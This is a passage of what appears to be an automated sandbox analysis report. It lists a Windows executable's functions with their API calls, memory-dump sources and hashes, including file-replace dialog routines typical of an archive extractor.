Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
Opcode Fuzzy Hash: 73d1c73de2458be19e671b531a173e4e40ee6bc1306bad9b072d3d881ba48749
Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432

Function 00BEE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
Opcode Fuzzy Hash: a108b0f6285e6d03fe5754a3626347c4604da5613be4b7c08955af4284ad4053
Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432

Function 00BEE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
Opcode Fuzzy Hash: 072b9cefa676d6ead28a7bf85564f04be632ea861a7d43959b420f2dec1e99cc
Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432

Function 00BEE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
Opcode Fuzzy Hash: 3ac0fde907bfbf09230dffe78d6d1d27d0cc8be1d483ad3ff5bd12bad5dd7c72
Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432

Function 00BEE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE3FC

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
Instruction ID: e4181112d748e7d76a7279c381eb320aec85b4722c27e39598a8b933a2dfffda
Opcode Fuzzy Hash: 7d022eba684f318a4b679797d106526eed2e3bc2261caa05f0f49e784a9a5128
Instruction Fuzzy Hash: 2CA012E11580817C711412021C42C37024CC0C0B10730466DF421840C06A4048045432

Function 00BEE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE580

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
Opcode Fuzzy Hash: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830

Function 00BEE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE580

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
Opcode Fuzzy Hash: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830

Function 00BEE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE580

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
Instruction ID: f9e4576e9ea6a981097b8f59dff244f082a4516a9f32fadc0aab48abf25997e4
Opcode Fuzzy Hash: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
Instruction Fuzzy Hash: 3AA011C22A80803CB00823A22C82C3B02ACC0E0B22B3083AEF820A00C0BA8088080830

Function 00BEE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
Opcode Fuzzy Hash: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830

Function 00BEE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9487da6faf625ccf51f6dfe798884af3cf0b605fe696301191242dd5901d7e5e
Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
Opcode Fuzzy Hash: 9487da6faf625ccf51f6dfe798884af3cf0b605fe696301191242dd5901d7e5e
Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830

Function 00BEE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 333e260cd313c2ac080c3bee9b82c09e5dd99672f293c3ed43823eb50fc34835
Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
Opcode Fuzzy Hash: 333e260cd313c2ac080c3bee9b82c09e5dd99672f293c3ed43823eb50fc34835
Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830

Function 00BEE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F

Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3d4273609fd5a8aeafe2196127c14055d48feb3da257c3884e51b2ccdbff2658
Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
Opcode Fuzzy Hash: 3d4273609fd5a8aeafe2196127c14055d48feb3da257c3884e51b2ccdbff2658
Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830

Function 00BD9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNELBASE(?,00BD903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BD9F0C

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File
String ID:
API String ID: 749574446-0
Opcode ID: e5f29f4a60a7c7bad23a1c4ce20c7d76e3b597a9aa4f71dca911cfb4b747a689
Instruction ID: 1b33539cca310cb9a2533ae27e475016f7352ed8f859f14179d022306e68c09f
Opcode Fuzzy Hash: e5f29f4a60a7c7bad23a1c4ce20c7d76e3b597a9aa4f71dca911cfb4b747a689
Instruction Fuzzy Hash: 06A0223008000E8BCE002B30CE0830E3B20FB20BC830202E8A00BCF0B2CB23880BCB20

Function 00BEAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,00BEAE72,C:\Users\user\Desktop,00000000,00C1946A,00000006), ref: 00BEAC08

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: a0ca77b27d691014841627196638469abbbd56a5fc46e6c8bdbe7f4460c19666
Instruction ID: 44e999f6003b173c849f4863f7f55c6fde1b57410d3524db5b34f838c4614b8e
Opcode Fuzzy Hash: a0ca77b27d691014841627196638469abbbd56a5fc46e6c8bdbe7f4460c19666
Instruction Fuzzy Hash: CBA011302082808BC2000B328F0AB0EBAAAAFA2B00F02C028A00088030CB30C820EA00

Function 00BD9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 353d631f08a9fbd85f5018b410b4a75e8e5d058aa264a6e0799c935aef09485d
Instruction ID: bd41e73ad9a1af0b697cbebae31e1f32879c1dc88dfac60303a7d9c55e2ec870
Opcode Fuzzy Hash: 353d631f08a9fbd85f5018b410b4a75e8e5d058aa264a6e0799c935aef09485d
Instruction Fuzzy Hash: A1F08970485B559FDB308E24C458792F7E8EB13325F045B9FD4E742AE0E761A98DDB40

Non-executed Functions

Function 00BEC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BEC2B1
EndDialog.USER32(?,00000006), ref: 00BEC2C4
GetDlgItem.USER32(?,0000006C), ref: 00BEC2E0
SetFocus.USER32(00000000), ref: 00BEC2E7
SetDlgItemTextW.USER32(?,00000065,?), ref: 00BEC321
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BEC358
FindFirstFileW.KERNEL32(?,?), ref: 00BEC36E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BEC38C
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC39C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC3B8
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC3D4
_swprintf.LIBCMT ref: 00BEC404

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BEC417
FindClose.KERNEL32(00000000), ref: 00BEC41E
_swprintf.LIBCMT ref: 00BEC477
SetDlgItemTextW.USER32(?,00000068,?), ref: 00BEC48A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BEC4A7
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BEC4C7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC4D7
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC4F1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC509
_swprintf.LIBCMT ref: 00BEC535
SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BEC548
_swprintf.LIBCMT ref: 00BEC59C
SetDlgItemTextW.USER32(?,00000069,?), ref: 00BEC5AF

Part of subcall function 00BEAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
Part of subcall function 00BEAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84

Strings

REPLACEFILEDLG, xrefs: 00BEC247
%s %s %s, xrefs: 00BEC3F2, 00BEC527
%s %s, xrefs: 00BEC469, 00BEC58E

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: abe1f1c34d9a9c0d3a88a095bc66c22de1975010582b9a0e1b3e2fdaaaecef10
Instruction ID: 6beddcca928b612598a31b8c7c0fb9a88037c24707ea7158f09e008cedbf76cd
